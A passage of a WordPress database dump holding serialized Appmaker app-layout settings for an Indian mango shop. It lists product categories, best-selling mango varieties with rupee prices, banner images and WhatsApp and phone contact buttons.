Concentrate\";s:5:\"value\";s:17:\"Mango Concentrate\";s:5:\"label\";s:5:\"Title\";s:7:\"display\";b:1;}s:6:\"action\";O:8:\"stdClass\":4:{s:5:\"value\";s:12:\"LIST_PRODUCT\";s:13:\"display_value\";s:16:\"Product Category\";s:5:\"label\";s:6:\"Action\";s:7:\"display\";b:1;}s:12:\"action_value\";O:8:\"stdClass\":4:{s:5:\"value\";i:76;s:13:\"display_value\";s:17:\"Mango Concentrate\";s:5:\"label\";s:26:\"Choose Product by Category\";s:7:\"display\";b:1;}}}i:3;O:8:\"stdClass\":2:{s:5:\"image\";O:8:\"stdClass\":4:{s:5:\"label\";s:5:\"Imgae\";s:7:\"display\";b:1;s:13:\"display_value\";s:171:\"https://mangomitra.in/wp-content/uploads/2022/01/79969457-homemade-mango-jam-with-fresh-fruits-and-leaves-of-mango-on-a-white-marble-caramelized-mango-jam-in--150x150.webp\";s:5:\"value\";O:8:\"stdClass\":3:{s:6:\"status\";s:7:\"success\";s:3:\"url\";s:171:\"https://mangomitra.in/wp-content/uploads/2022/01/79969457-homemade-mango-jam-with-fresh-fruits-and-leaves-of-mango-on-a-white-marble-caramelized-mango-jam-in--150x150.webp\";s:4:\"meta\";O:8:\"stdClass\":2:{s:5:\"width\";i:300;s:6:\"height\";i:300;}}}s:4:\"data\";O:8:\"stdClass\":4:{s:5:\"image\";O:8:\"stdClass\":4:{s:5:\"label\";s:5:\"Imgae\";s:7:\"display\";b:1;s:13:\"display_value\";s:171:\"https://mangomitra.in/wp-content/uploads/2022/01/79969457-homemade-mango-jam-with-fresh-fruits-and-leaves-of-mango-on-a-white-marble-caramelized-mango-jam-in--150x150.webp\";s:5:\"value\";O:8:\"stdClass\":3:{s:6:\"status\";s:7:\"success\";s:3:\"url\";s:171:\"https://mangomitra.in/wp-content/uploads/2022/01/79969457-homemade-mango-jam-with-fresh-fruits-and-leaves-of-mango-on-a-white-marble-caramelized-mango-jam-in--150x150.webp\";s:4:\"meta\";O:8:\"stdClass\":2:{s:5:\"width\";i:300;s:6:\"height\";i:300;}}}s:5:\"title\";O:8:\"stdClass\":4:{s:13:\"display_value\";s:10:\"Mango Jams\";s:5:\"value\";s:10:\"Mango Jams\";s:5:\"label\";s:5:\"Title\";s:7:\"display\";b:1;}s:6:\"action\";O:8:\"stdClass\":4:{s:5:\"value\";s:12:\"LIST_PRODUCT\";s:13:\"display_value\";s:16:\"Product Category\";s:5:\"label\";s:6:\"Action\";s:7:\"display\";b:1;}s:12:\"action_value\";O:8:\"stdClass\":4:{s:5:\"value\";i:38;s:13:\"display_value\";s:10:\"Mango Jams\";s:5:\"label\";s:26:\"Choose Product by Category\";s:7:\"display\";b:1;}}}}s:5:\"title\";s:10:\"Categories\";}i:2;O:8:\"stdClass\":6:{s:4:\"type\";s:26:\"pre_build_product_scroller\";s:8:\"expanded\";b:1;s:4:\"data\";a:1:{i:0;O:8:\"stdClass\":1:{s:4:\"data\";O:8:\"stdClass\":2:{s:12:\"action_value\";O:8:\"stdClass\":4:{s:5:\"value\";s:12:\"BEST_SELLING\";s:13:\"display_value\";s:21:\"Best Selling Products\";s:5:\"label\";s:23:\"Choose Product Scroller\";s:7:\"display\";b:1;}s:2:\"id\";s:0:\"\";}}}s:9:\"data_main\";O:8:\"stdClass\":4:{s:21:\"show_view_more_button\";O:8:\"stdClass\":4:{s:5:\"value\";b:0;s:13:\"display_value\";s:4:\"Hide\";s:5:\"label\";s:21:\"show view more button\";s:7:\"display\";b:1;}s:22:\"view_more_button_title\";O:8:\"stdClass\":4:{s:5:\"value\";s:9:\"View more\";s:13:\"display_value\";s:9:\"View more\";s:5:\"label\";s:22:\"View more button title\";s:7:\"display\";b:1;}s:16:\"view_more_action\";s:9:\"NO_ACTION\";s:22:\"view_more_action_value\";s:0:\"\";}s:5:\"title\";s:21:\"Best Selling Products\";s:3:\"key\";s:16:\"widget_key_32982\";}i:3;O:8:\"stdClass\":6:{s:4:\"type\";s:6:\"banner\";s:8:\"expanded\";b:1;s:4:\"data\";a:1:{i:0;O:8:\"stdClass\":2:{s:5:\"image\";O:8:\"stdClass\":4:{s:5:\"label\";s:5:\"Image\";s:7:\"display\";b:1;s:5:\"value\";O:8:\"stdClass\":3:{s:6:\"status\";s:7:\"success\";s:3:\"url\";s:68:\"http://demo.shopilder.com/wp-content/uploads/2019/09/Group-214-1.png\";s:4:\"meta\";O:8:\"stdClass\":2:{s:6:\"height\";i:345;s:5:\"width\";i:1080;}}s:13:\"display_value\";s:68:\"http://demo.shopilder.com/wp-content/uploads/2019/09/Group-214-1.png\";}s:4:\"data\";O:8:\"stdClass\":3:{s:6:\"action\";O:8:\"stdClass\":4:{s:5:\"value\";s:12:\"LIST_PRODUCT\";s:13:\"display_value\";s:16:\"Product Category\";s:5:\"label\";s:6:\"Action\";s:7:\"display\";b:1;}s:12:\"action_value\";O:8:\"stdClass\":4:{s:5:\"value\";s:0:\"\";s:13:\"display_value\";s:3:\"All\";s:5:\"label\";s:26:\"Choose Product by Category\";s:7:\"display\";b:1;}s:5:\"image\";O:8:\"stdClass\":4:{s:5:\"label\";s:5:\"Image\";s:7:\"display\";b:1;s:5:\"value\";O:8:\"stdClass\":3:{s:6:\"status\";s:7:\"success\";s:3:\"url\";s:68:\"http://demo.shopilder.com/wp-content/uploads/2019/09/Group-214-1.png\";s:4:\"meta\";O:8:\"stdClass\":2:{s:6:\"height\";i:345;s:5:\"width\";i:1080;}}s:13:\"display_value\";s:68:\"http://demo.shopilder.com/wp-content/uploads/2019/09/Group-214-1.png\";}}}}s:5:\"title\";s:0:\"\";s:3:\"key\";s:16:\"widget_key_29792\";s:9:\"data_main\";O:8:\"stdClass\":0:{}}i:4;O:8:\"stdClass\":6:{s:4:\"data\";a:1:{i:0;O:8:\"stdClass\":1:{s:4:\"data\";O:8:\"stdClass\":1:{s:4:\"html\";O:8:\"stdClass\":4:{s:13:\"display_value\";s:64:\"<p><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Contact us</strong></p>\";s:5:\"value\";s:64:\"<p><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Contact us</strong></p>\";s:5:\"label\";s:4:\"Html\";s:7:\"display\";b:1;}}}}s:3:\"key\";s:16:\"widget_key_42142\";s:4:\"type\";s:4:\"html\";s:8:\"expanded\";b:1;s:9:\"data_main\";O:8:\"stdClass\":0:{}s:5:\"title\";s:0:\"\";}i:5;O:8:\"stdClass\":6:{s:4:\"type\";s:4:\"menu\";s:8:\"expanded\";b:1;s:9:\"data_main\";O:8:\"stdClass\":0:{}s:3:\"key\";s:16:\"widget_key_31212\";s:4:\"data\";a:2:{i:0;O:8:\"stdClass\":2:{s:5:\"image\";O:8:\"stdClass\":4:{s:5:\"label\";s:5:\"Imgae\";s:7:\"display\";b:1;s:13:\"display_value\";s:65:\"http://demo.shopilder.com/wp-content/uploads/2019/07/whatsapp.png\";s:5:\"value\";O:8:\"stdClass\":2:{s:3:\"url\";s:65:\"http://demo.shopilder.com/wp-content/uploads/2019/07/whatsapp.png\";s:4:\"meta\";O:8:\"stdClass\":2:{s:5:\"width\";i:121;s:6:\"height\";i:121;}}}s:4:\"data\";O:8:\"stdClass\":4:{s:5:\"image\";O:8:\"stdClass\":4:{s:5:\"label\";s:5:\"Imgae\";s:7:\"display\";b:1;s:13:\"display_value\";s:65:\"http://demo.shopilder.com/wp-content/uploads/2019/07/whatsapp.png\";s:5:\"value\";O:8:\"stdClass\":2:{s:3:\"url\";s:65:\"http://demo.shopilder.com/wp-content/uploads/2019/07/whatsapp.png\";s:4:\"meta\";O:8:\"stdClass\":2:{s:5:\"width\";i:121;s:6:\"height\";i:121;}}}s:5:\"title\";O:8:\"stdClass\":4:{s:13:\"display_value\";s:16:\"Chat on whatsapp\";s:5:\"value\";s:16:\"Chat on whatsapp\";s:5:\"label\";s:5:\"Title\";s:7:\"display\";b:1;}s:6:\"action\";O:8:\"stdClass\":4:{s:5:\"value\";s:8:\"OPEN_URL\";s:13:\"display_value\";s:8:\"Open URL\";s:5:\"label\";s:6:\"Action\";s:7:\"display\";b:1;}s:12:\"action_value\";O:8:\"stdClass\":4:{s:5:\"value\";s:81:\"https://api.whatsapp.com/send?phone=919778178955&text=Hola%20team%20at%20appmaker\";s:13:\"display_value\";s:81:\"https://api.whatsapp.com/send?phone=919778178955&text=Hola%20team%20at%20appmaker\";s:5:\"label\";s:3:\"URL\";s:7:\"display\";b:1;}}}i:1;O:8:\"stdClass\":2:{s:5:\"image\";O:8:\"stdClass\":4:{s:5:\"label\";s:5:\"Imgae\";s:7:\"display\";b:1;s:13:\"display_value\";s:61:\"http://demo.shopilder.com/wp-content/uploads/2019/07/call.png\";s:5:\"value\";O:8:\"stdClass\":2:{s:3:\"url\";s:61:\"http://demo.shopilder.com/wp-content/uploads/2019/07/call.png\";s:4:\"meta\";O:8:\"stdClass\":2:{s:5:\"width\";i:121;s:6:\"height\";i:121;}}}s:4:\"data\";O:8:\"stdClass\":4:{s:5:\"image\";O:8:\"stdClass\":4:{s:5:\"label\";s:5:\"Imgae\";s:7:\"display\";b:1;s:13:\"display_value\";s:61:\"http://demo.shopilder.com/wp-content/uploads/2019/07/call.png\";s:5:\"value\";O:8:\"stdClass\":2:{s:3:\"url\";s:61:\"http://demo.shopilder.com/wp-content/uploads/2019/07/call.png\";s:4:\"meta\";O:8:\"stdClass\":2:{s:5:\"width\";i:121;s:6:\"height\";i:121;}}}s:5:\"title\";O:8:\"stdClass\":4:{s:13:\"display_value\";s:7:\"Call us\";s:5:\"value\";s:7:\"Call us\";s:5:\"label\";s:5:\"Title\";s:7:\"display\";b:1;}s:6:\"action\";O:8:\"stdClass\":4:{s:5:\"value\";s:8:\"OPEN_URL\";s:13:\"display_value\";s:8:\"Open URL\";s:5:\"label\";s:6:\"Action\";s:7:\"display\";b:1;}s:12:\"action_value\";O:8:\"stdClass\":4:{s:5:\"value\";s:17:\"tel:+919778178955\";s:13:\"display_value\";s:17:\"tel:+919778178955\";s:5:\"label\";s:3:\"URL\";s:7:\"display\";b:1;}}}}s:5:\"title\";s:10:\"Contact us\";}}s:5:\"title\";s:4:\"Home\";s:2:\"id\";s:4:\"home\";s:8:\"language\";s:7:\"default\";s:8:\"parentID\";s:4:\"home\";s:7:\"version\";s:4:\"v1.1\";s:4:\"type\";s:6:\"NORMAL\";}','yes'),(26735,'appmaker_wc_inAppPages_home_app','a:4:{s:2:\"id\";s:4:\"home\";s:5:\"title\";s:4:\"Home\";s:7:\"widgets\";a:6:{i:0;a:4:{s:4:\"type\";s:6:\"slider\";s:5:\"title\";s:0:\"\";s:4:\"data\";a:4:{i:0;a:4:{s:5:\"image\";s:65:\"http://demo.shopilder.com/wp-content/uploads/2019/07/banner-1.png\";s:10:\"dimensions\";O:8:\"stdClass\":2:{s:5:\"width\";i:1080;s:6:\"height\";i:575;}s:5:\"title\";s:0:\"\";s:6:\"action\";a:2:{s:4:\"type\";s:16:\"OPEN_IN_APP_PAGE\";s:6:\"params\";a:1:{s:2:\"id\";s:4:\"home\";}}}i:1;a:4:{s:5:\"image\";s:65:\"http://demo.shopilder.com/wp-content/uploads/2019/07/banner-2.png\";s:10:\"dimensions\";O:8:\"stdClass\":2:{s:5:\"width\";i:1080;s:6:\"height\";i:575;}s:5:\"title\";s:0:\"\";s:6:\"action\";a:2:{s:4:\"type\";s:12:\"LIST_PRODUCT\";s:6:\"params\";a:2:{s:8:\"category\";s:0:\"\";s:5:\"title\";s:0:\"\";}}}i:2;a:4:{s:5:\"image\";s:65:\"http://demo.shopilder.com/wp-content/uploads/2019/07/banner-3.png\";s:10:\"dimensions\";O:8:\"stdClass\":2:{s:5:\"width\";i:1080;s:6:\"height\";i:575;}s:5:\"title\";s:0:\"\";s:6:\"action\";a:2:{s:4:\"type\";s:12:\"LIST_PRODUCT\";s:6:\"params\";a:2:{s:8:\"category\";s:0:\"\";s:5:\"title\";s:0:\"\";}}}i:3;a:4:{s:5:\"image\";s:65:\"http://demo.shopilder.com/wp-content/uploads/2019/07/banner-4.png\";s:10:\"dimensions\";O:8:\"stdClass\":2:{s:5:\"width\";i:1080;s:6:\"height\";i:575;}s:5:\"title\";s:0:\"\";s:6:\"action\";a:2:{s:4:\"type\";s:12:\"LIST_PRODUCT\";s:6:\"params\";a:2:{s:8:\"category\";s:0:\"\";s:5:\"title\";s:0:\"\";}}}}s:4:\"meta\";a:0:{}}i:1;a:4:{s:4:\"type\";s:4:\"grid\";s:5:\"title\";s:10:\"Categories\";s:4:\"data\";a:4:{i:0;a:4:{s:5:\"image\";s:63:\"https://mangomitra.in/wp-content/uploads/2022/01/03-150x150.png\";s:10:\"dimensions\";O:8:\"stdClass\":2:{s:5:\"width\";i:300;s:6:\"height\";i:300;}s:5:\"title\";s:11:\"Dried Mango\";s:6:\"action\";a:2:{s:4:\"type\";s:12:\"LIST_PRODUCT\";s:6:\"params\";a:2:{s:8:\"category\";i:80;s:5:\"title\";s:11:\"Dried Mango\";}}}i:1;a:4:{s:5:\"image\";s:63:\"https://mangomitra.in/wp-content/uploads/2022/01/15-150x150.png\";s:10:\"dimensions\";O:8:\"stdClass\":2:{s:5:\"width\";i:300;s:6:\"height\";i:300;}s:5:\"title\";s:13:\"Fresh Mangoes\";s:6:\"action\";a:2:{s:4:\"type\";s:12:\"LIST_PRODUCT\";s:6:\"params\";a:2:{s:8:\"category\";i:35;s:5:\"title\";s:13:\"Fresh Mangoes\";}}}i:2;a:4:{s:5:\"image\";s:63:\"https://mangomitra.in/wp-content/uploads/2022/01/16-150x150.png\";s:10:\"dimensions\";O:8:\"stdClass\":2:{s:5:\"width\";i:300;s:6:\"height\";i:300;}s:5:\"title\";s:17:\"Mango Concentrate\";s:6:\"action\";a:2:{s:4:\"type\";s:12:\"LIST_PRODUCT\";s:6:\"params\";a:2:{s:8:\"category\";i:76;s:5:\"title\";s:17:\"Mango Concentrate\";}}}i:3;a:4:{s:5:\"image\";s:171:\"https://mangomitra.in/wp-content/uploads/2022/01/79969457-homemade-mango-jam-with-fresh-fruits-and-leaves-of-mango-on-a-white-marble-caramelized-mango-jam-in--150x150.webp\";s:10:\"dimensions\";O:8:\"stdClass\":2:{s:5:\"width\";i:300;s:6:\"height\";i:300;}s:5:\"title\";s:10:\"Mango Jams\";s:6:\"action\";a:2:{s:4:\"type\";s:12:\"LIST_PRODUCT\";s:6:\"params\";a:2:{s:8:\"category\";i:38;s:5:\"title\";s:10:\"Mango Jams\";}}}}s:4:\"meta\";a:4:{s:14:\"items_per_line\";s:1:\"2\";s:21:\"show_view_more_button\";b:0;s:22:\"view_more_button_title\";s:9:\"View more\";s:16:\"view_more_action\";a:3:{s:4:\"type\";s:9:\"NO_ACTION\";s:13:\"original_type\";s:9:\"NO_ACTION\";s:6:\"params\";a:1:{s:5:\"value\";s:0:\"\";}}}}i:2;a:4:{s:4:\"type\";s:16:\"product_scroller\";s:5:\"title\";s:21:\"Best Selling Products\";s:4:\"data\";a:15:{i:0;a:47:{s:2:\"id\";i:529;s:4:\"name\";s:8:\"Totapuri\";s:4:\"slug\";s:8:\"totapuri\";s:9:\"permalink\";s:39:\"https://mangomitra.in/product/totapuri/\";s:4:\"type\";s:6:\"simple\";s:8:\"featured\";b:0;s:17:\"short_description\";s:0:\"\";s:3:\"sku\";s:0:\"\";s:8:\"currency\";s:3:\"INR\";s:15:\"currency_symbol\";s:3:\"₹\";s:5:\"price\";s:3:\"100\";s:13:\"regular_price\";s:3:\"100\";s:10:\"sale_price\";s:0:\"\";s:13:\"price_display\";s:9:\"₹100.00\";s:21:\"regular_price_display\";s:9:\"₹100.00\";s:18:\"sale_price_display\";s:7:\"₹0.00\";s:10:\"price_html\";s:131:\"<span class=\"woocommerce-Price-amount amount\"><bdi><span class=\"woocommerce-Price-currencySymbol\">&#8377;</span>100.00</bdi></span>\";s:7:\"on_sale\";b:0;s:15:\"sale_percentage\";b:0;s:11:\"purchasable\";b:1;s:12:\"downloadable\";b:0;s:19:\"display_add_to_cart\";b:1;s:27:\"change_thumbnail_image_size\";b:0;s:18:\"hide_buy_now_block\";b:0;s:14:\"buy_now_action\";a:2:{s:4:\"type\";s:6:\"normal\";s:6:\"params\";a:0:{}}s:19:\"buy_now_button_text\";s:7:\"Buy now\";s:23:\"add_to_cart_button_text\";s:11:\"Add to cart\";s:10:\"qty_config\";a:7:{s:4:\"type\";s:6:\"normal\";s:5:\"label\";s:8:\"Quantity\";s:7:\"display\";b:1;s:11:\"input_value\";s:1:\"1\";s:9:\"max_value\";s:4:\"1000\";s:9:\"min_value\";s:1:\"1\";s:4:\"step\";s:1:\"1\";}s:14:\"stock_quantity\";N;s:8:\"in_stock\";b:1;s:6:\"weight\";s:0:\"\";s:10:\"dimensions\";a:3:{s:6:\"length\";s:0:\"\";s:5:\"width\";s:0:\"\";s:6:\"height\";s:0:\"\";}s:15:\"reviews_allowed\";b:1;s:14:\"display_rating\";b:1;s:14:\"average_rating\";s:4:\"0.00\";s:12:\"rating_count\";i:0;s:6:\"images\";a:1:{i:0;s:63:\"https://mangomitra.in/wp-content/uploads/2022/01/02-300x228.png\";}s:9:\"thumbnail\";s:63:\"https://mangomitra.in/wp-content/uploads/2022/01/02-300x228.png\";s:14:\"thumbnail_meta\";a:2:{s:5:\"width\";i:300;s:6:\"height\";i:228;}s:11:\"images_meta\";a:1:{i:0;a:2:{s:7:\"caption\";s:0:\"\";s:4:\"size\";a:2:{s:5:\"width\";i:300;s:6:\"height\";i:228;}}}s:16:\"notify_backorder\";b:0;s:22:\"notify_backorder_label\";s:12:\"On backorder\";s:5:\"color\";b:0;s:10:\"attributes\";a:0:{}s:18:\"default_attributes\";a:0:{}s:18:\"product_in_webview\";b:0;s:6:\"labels\";a:0:{}}i:1;a:47:{s:2:\"id\";i:637;s:4:\"name\";s:9:\"mango jam\";s:4:\"slug\";s:11:\"mango-jam-2\";s:9:\"permalink\";s:42:\"https://mangomitra.in/product/mango-jam-2/\";s:4:\"type\";s:6:\"simple\";s:8:\"featured\";b:0;s:17:\"short_description\";s:0:\"\";s:3:\"sku\";s:0:\"\";s:8:\"currency\";s:3:\"INR\";s:15:\"currency_symbol\";s:3:\"₹\";s:5:\"price\";s:2:\"68\";s:13:\"regular_price\";s:2:\"68\";s:10:\"sale_price\";s:0:\"\";s:13:\"price_display\";s:8:\"₹68.00\";s:21:\"regular_price_display\";s:8:\"₹68.00\";s:18:\"sale_price_display\";s:7:\"₹0.00\";s:10:\"price_html\";s:130:\"<span class=\"woocommerce-Price-amount amount\"><bdi><span class=\"woocommerce-Price-currencySymbol\">&#8377;</span>68.00</bdi></span>\";s:7:\"on_sale\";b:0;s:15:\"sale_percentage\";b:0;s:11:\"purchasable\";b:1;s:12:\"downloadable\";b:0;s:19:\"display_add_to_cart\";b:1;s:27:\"change_thumbnail_image_size\";b:0;s:18:\"hide_buy_now_block\";b:0;s:14:\"buy_now_action\";a:2:{s:4:\"type\";s:6:\"normal\";s:6:\"params\";a:0:{}}s:19:\"buy_now_button_text\";s:7:\"Buy now\";s:23:\"add_to_cart_button_text\";s:11:\"Add to cart\";s:10:\"qty_config\";a:7:{s:4:\"type\";s:6:\"normal\";s:5:\"label\";s:8:\"Quantity\";s:7:\"display\";b:1;s:11:\"input_value\";s:1:\"1\";s:9:\"max_value\";s:4:\"1000\";s:9:\"min_value\";s:1:\"1\";s:4:\"step\";s:1:\"1\";}s:14:\"stock_quantity\";N;s:8:\"in_stock\";b:1;s:6:\"weight\";s:0:\"\";s:10:\"dimensions\";a:3:{s:6:\"length\";s:0:\"\";s:5:\"width\";s:0:\"\";s:6:\"height\";s:0:\"\";}s:15:\"reviews_allowed\";b:1;s:14:\"display_rating\";b:1;s:14:\"average_rating\";s:4:\"0.00\";s:12:\"rating_count\";i:0;s:6:\"images\";a:1:{i:0;s:171:\"https://mangomitra.in/wp-content/uploads/2022/01/79969457-homemade-mango-jam-with-fresh-fruits-and-leaves-of-mango-on-a-white-marble-caramelized-mango-jam-in--300x200.webp\";}s:9:\"thumbnail\";s:171:\"https://mangomitra.in/wp-content/uploads/2022/01/79969457-homemade-mango-jam-with-fresh-fruits-and-leaves-of-mango-on-a-white-marble-caramelized-mango-jam-in--300x200.webp\";s:14:\"thumbnail_meta\";a:2:{s:5:\"width\";i:300;s:6:\"height\";i:200;}s:11:\"images_meta\";a:1:{i:0;a:2:{s:7:\"caption\";s:0:\"\";s:4:\"size\";a:2:{s:5:\"width\";i:300;s:6:\"height\";i:200;}}}s:16:\"notify_backorder\";b:0;s:22:\"notify_backorder_label\";s:12:\"On backorder\";s:5:\"color\";b:0;s:10:\"attributes\";a:0:{}s:18:\"default_attributes\";a:0:{}s:18:\"product_in_webview\";b:0;s:6:\"labels\";a:0:{}}i:2;a:47:{s:2:\"id\";i:541;s:4:\"name\";s:6:\"Langra\";s:4:\"slug\";s:6:\"langra\";s:9:\"permalink\";s:37:\"https://mangomitra.in/product/langra/\";s:4:\"type\";s:6:\"simple\";s:8:\"featured\";b:0;s:17:\"short_description\";s:0:\"\";s:3:\"sku\";s:0:\"\";s:8:\"currency\";s:3:\"INR\";s:15:\"currency_symbol\";s:3:\"₹\";s:5:\"price\";s:3:\"210\";s:13:\"regular_price\";s:3:\"210\";s:10:\"sale_price\";s:0:\"\";s:13:\"price_display\";s:9:\"₹210.00\";s:21:\"regular_price_display\";s:9:\"₹210.00\";s:18:\"sale_price_display\";s:7:\"₹0.00\";s:10:\"price_html\";s:131:\"<span class=\"woocommerce-Price-amount amount\"><bdi><span class=\"woocommerce-Price-currencySymbol\">&#8377;</span>210.00</bdi></span>\";s:7:\"on_sale\";b:0;s:15:\"sale_percentage\";b:0;s:11:\"purchasable\";b:1;s:12:\"downloadable\";b:0;s:19:\"display_add_to_cart\";b:1;s:27:\"change_thumbnail_image_size\";b:0;s:18:\"hide_buy_now_block\";b:0;s:14:\"buy_now_action\";a:2:{s:4:\"type\";s:6:\"normal\";s:6:\"params\";a:0:{}}s:19:\"buy_now_button_text\";s:7:\"Buy now\";s:23:\"add_to_cart_button_text\";s:11:\"Add to cart\";s:10:\"qty_config\";a:7:{s:4:\"type\";s:6:\"normal\";s:5:\"label\";s:8:\"Quantity\";s:7:\"display\";b:1;s:11:\"input_value\";s:1:\"1\";s:9:\"max_value\";s:4:\"1000\";s:9:\"min_value\";s:1:\"1\";s:4:\"step\";s:1:\"1\";}s:14:\"stock_quantity\";N;s:8:\"in_stock\";b:1;s:6:\"weight\";s:0:\"\";s:10:\"dimensions\";a:3:{s:6:\"length\";s:0:\"\";s:5:\"width\";s:0:\"\";s:6:\"height\";s:0:\"\";}s:15:\"reviews_allowed\";b:1;s:14:\"display_rating\";b:1;s:14:\"average_rating\";s:4:\"0.00\";s:12:\"rating_count\";i:0;s:6:\"images\";a:1:{i:0;s:65:\"https://mangomitra.in/wp-content/uploads/2022/01/14-2-300x230.png\";}s:9:\"thumbnail\";s:65:\"https://mangomitra.in/wp-content/uploads/2022/01/14-2-300x230.png\";s:14:\"thumbnail_meta\";a:2:{s:5:\"width\";i:300;s:6:\"height\";i:230;}s:11:\"images_meta\";a:1:{i:0;a:2:{s:7:\"caption\";s:0:\"\";s:4:\"size\";a:2:{s:5:\"width\";i:300;s:6:\"height\";i:230;}}}s:16:\"notify_backorder\";b:0;s:22:\"notify_backorder_label\";s:12:\"On backorder\";s:5:\"color\";b:0;s:10:\"attributes\";a:0:{}s:18:\"default_attributes\";a:0:{}s:18:\"product_in_webview\";b:0;s:6:\"labels\";a:0:{}}i:3;a:47:{s:2:\"id\";i:530;s:4:\"name\";s:5:\"Hapus\";s:4:\"slug\";s:5:\"hapus\";s:9:\"permalink\";s:36:\"https://mangomitra.in/product/hapus/\";s:4:\"type\";s:6:\"simple\";s:8:\"featured\";b:0;s:17:\"short_description\";s:0:\"\";s:3:\"sku\";s:0:\"\";s:8:\"currency\";s:3:\"INR\";s:15:\"currency_symbol\";s:3:\"₹\";s:5:\"price\";s:3:\"110\";s:13:\"regular_price\";s:3:\"110\";s:10:\"sale_price\";s:0:\"\";s:13:\"price_display\";s:9:\"₹110.00\";s:21:\"regular_price_display\";s:9:\"₹110.00\";s:18:\"sale_price_display\";s:7:\"₹0.00\";s:10:\"price_html\";s:131:\"<span class=\"woocommerce-Price-amount amount\"><bdi><span class=\"woocommerce-Price-currencySymbol\">&#8377;</span>110.00</bdi></span>\";s:7:\"on_sale\";b:0;s:15:\"sale_percentage\";b:0;s:11:\"purchasable\";b:1;s:12:\"downloadable\";b:0;s:19:\"display_add_to_cart\";b:1;s:27:\"change_thumbnail_image_size\";b:0;s:18:\"hide_buy_now_block\";b:0;s:14:\"buy_now_action\";a:2:{s:4:\"type\";s:6:\"normal\";s:6:\"params\";a:0:{}}s:19:\"buy_now_button_text\";s:7:\"Buy now\";s:23:\"add_to_cart_button_text\";s:11:\"Add to cart\";s:10:\"qty_config\";a:7:{s:4:\"type\";s:6:\"normal\";s:5:\"label\";s:8:\"Quantity\";s:7:\"display\";b:1;s:11:\"input_value\";s:1:\"1\";s:9:\"max_value\";s:4:\"1000\";s:9:\"min_value\";s:1:\"1\";s:4:\"step\";s:1:\"1\";}s:14:\"stock_quantity\";N;s:8:\"in_stock\";b:1;s:6:\"weight\";s:0:\"\";s:10:\"dimensions\";a:3:{s:6:\"length\";s:0:\"\";s:5:\"width\";s:0:\"\";s:6:\"height\";s:0:\"\";}s:15:\"reviews_allowed\";b:1;s:14:\"display_rating\";b:1;s:14:\"average_rating\";s:4:\"0.00\";s:12:\"rating_count\";i:0;s:6:\"images\";a:1:{i:0;s:63:\"https://mangomitra.in/wp-content/uploads/2022/01/03-300x223.png\";}s:9:\"thumbnail\";s:63:\"https://mangomitra.in/wp-content/uploads/2022/01/03-300x223.png\";s:14:\"thumbnail_meta\";a:2:{s:5:\"width\";i:300;s:6:\"height\";i:223;}s:11:\"images_meta\";a:1:{i:0;a:2:{s:7:\"caption\";s:0:\"\";s:4:\"size\";a:2:{s:5:\"width\";i:300;s:6:\"height\";i:223;}}}s:16:\"notify_backorder\";b:0;s:22:\"notify_backorder_label\";s:12:\"On backorder\";s:5:\"color\";b:0;s:10:\"attributes\";a:0:{}s:18:\"default_attributes\";a:0:{}s:18:\"product_in_webview\";b:0;s:6:\"labels\";a:0:{}}i:4;a:47:{s:2:\"id\";i:537;s:4:\"name\";s:9:\"Himasagar\";s:4:\"slug\";s:9:\"himasagar\";s:9:\"permalink\";s:40:\"https://mangomitra.in/product/himasagar/\";s:4:\"type\";s:6:\"simple\";s:8:\"featured\";b:0;s:17:\"short_description\";s:0:\"\";s:3:\"sku\";s:0:\"\";s:8:\"currency\";s:3:\"INR\";s:15:\"currency_symbol\";s:3:\"₹\";s:5:\"price\";s:3:\"110\";s:13:\"regular_price\";s:3:\"110\";s:10:\"sale_price\";s:0:\"\";s:13:\"price_display\";s:9:\"₹110.00\";s:21:\"regular_price_display\";s:9:\"₹110.00\";s:18:\"sale_price_display\";s:7:\"₹0.00\";s:10:\"price_html\";s:131:\"<span class=\"woocommerce-Price-amount amount\"><bdi><span class=\"woocommerce-Price-currencySymbol\">&#8377;</span>110.00</bdi></span>\";s:7:\"on_sale\";b:0;s:15:\"sale_percentage\";b:0;s:11:\"purchasable\";b:1;s:12:\"downloadable\";b:0;s:19:\"display_add_to_cart\";b:1;s:27:\"change_thumbnail_image_size\";b:0;s:18:\"hide_buy_now_block\";b:0;s:14:\"buy_now_action\";a:2:{s:4:\"type\";s:6:\"normal\";s:6:\"params\";a:0:{}}s:19:\"buy_now_button_text\";s:7:\"Buy now\";s:23:\"add_to_cart_button_text\";s:11:\"Add to cart\";s:10:\"qty_config\";a:7:{s:4:\"type\";s:6:\"normal\";s:5:\"label\";s:8:\"Quantity\";s:7:\"display\";b:1;s:11:\"input_value\";s:1:\"1\";s:9:\"max_value\";s:4:\"1000\";s:9:\"min_value\";s:1:\"1\";s:4:\"step\";s:1:\"1\";}s:14:\"stock_quantity\";N;s:8:\"in_stock\";b:1;s:6:\"weight\";s:0:\"\";s:10:\"dimensions\";a:3:{s:6:\"length\";s:0:\"\";s:5:\"width\";s:0:\"\";s:6:\"height\";s:0:\"\";}s:15:\"reviews_allowed\";b:1;s:14:\"display_rating\";b:1;s:14:\"average_rating\";s:4:\"0.00\";s:12:\"rating_count\";i:0;s:6:\"images\";a:1:{i:0;s:63:\"https://mangomitra.in/wp-content/uploads/2022/01/10-300x227.png\";}s:9:\"thumbnail\";s:63:\"https://mangomitra.in/wp-content/uploads/2022/01/10-300x227.png\";s:14:\"thumbnail_meta\";a:2:{s:5:\"width\";i:300;s:6:\"height\";i:227;}s:11:\"images_meta\";a:1:{i:0;a:2:{s:7:\"caption\";s:0:\"\";s:4:\"size\";a:2:{s:5:\"width\";i:300;s:6:\"height\";i:227;}}}s:16:\"notify_backorder\";b:0;s:22:\"notify_backorder_label\";s:12:\"On 